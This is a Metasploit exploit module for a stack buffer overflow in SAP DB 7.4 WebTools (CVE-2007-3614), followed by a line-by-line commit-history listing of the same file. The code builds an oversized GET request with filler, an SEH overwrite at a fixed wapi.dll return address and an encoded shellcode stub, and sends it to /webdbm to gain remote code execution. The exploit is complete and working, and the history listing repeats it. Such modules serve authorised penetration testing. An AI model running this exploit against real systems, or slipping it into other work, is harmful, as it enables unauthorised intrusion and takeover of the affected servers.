modules/exploits/windows/http/sapdb_webtools.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SAP DB 7.4 WebTools Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.
				By sending an overly long GET request, it may be possible for
				an attacker to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2007-3614' ],
					[ 'OSVDB', '37838' ],
					[ 'BID', '24773' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 850,
					'BadChars' => "\x00",
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0
				],
			'DisclosureDate' => 'Jul 5 2007',
			'DefaultTarget'  => 0))

		register_options( [ Opt::RPORT(9999) ], self.class )
	end

	def exploit

		filler = rand_text_alphanumeric(20774)
		seh = generate_seh_payload(target.ret)

		sploit = filler + seh + rand_text_alphanumeric(3000)

		print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)

		res = send_request_raw(
			{
				'uri'   => '/webdbm',
				'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
			}, 5)

		handler

	end

end
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`##`
Updated svn:keywords 2007-09-10 01:01:20 +00:00			`# $Id$`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`##`

			`##`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00
add more http fingerprints, thx mc 2010-07-14 00:02:21 +00:00			`HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] }`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::Seh`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00
			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`'Name' => 'SAP DB 7.4 WebTools Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`By sending an overly long GET request, it may be possible for`
style compliance fixes 2010-07-16 02:33:25 +00:00			`an attacker to execute arbitrary code.`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
Updated svn:keywords 2007-09-10 01:01:20 +00:00			`'Version' => '$Revision$',`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`'References' =>`
			`[`
			`[ 'CVE', '2007-3614' ],`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`[ 'OSVDB', '37838' ],`
			`[ 'BID', '24773' ],`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 850,`
updated due to reliability. all payloads work now. 2010-07-13 22:38:44 +00:00			`'BadChars' => "\x00",`
			`'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",`
style compliance fixes 2010-07-16 02:33:25 +00:00			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
updated due to reliability. all payloads work now. 2010-07-13 22:38:44 +00:00			`'EncoderOptions' =>`
			`{`
			`'BufferRegister' => 'ECX',`
			`},`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`[`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`],`
various fixes, mostly consistency changes to disclosure dates 2010-06-15 07:18:08 +00:00			`'DisclosureDate' => 'Jul 5 2007',`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`'DefaultTarget' => 0))`

big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options( [ Opt::RPORT(9999) ], self.class )`
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`end`

			`def exploit`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`filler = rand_text_alphanumeric(20774)`
			`seh = generate_seh_payload(target.ret)`
style compliance fixes 2010-07-16 02:33:25 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`sploit = filler + seh + rand_text_alphanumeric(3000)`

			`print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
style compliance fixes 2010-07-16 02:33:25 +00:00			`res = send_request_raw(`
			`{`
			`'uri' => '/webdbm',`
			`'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit`
			`}, 5)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`handler`
updated due to reliability. all payloads work now. 2010-07-13 22:38:44 +00:00
added exploit module sapdb_webtools.rb 2007-07-11 21:16:30 +00:00			`end`

OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`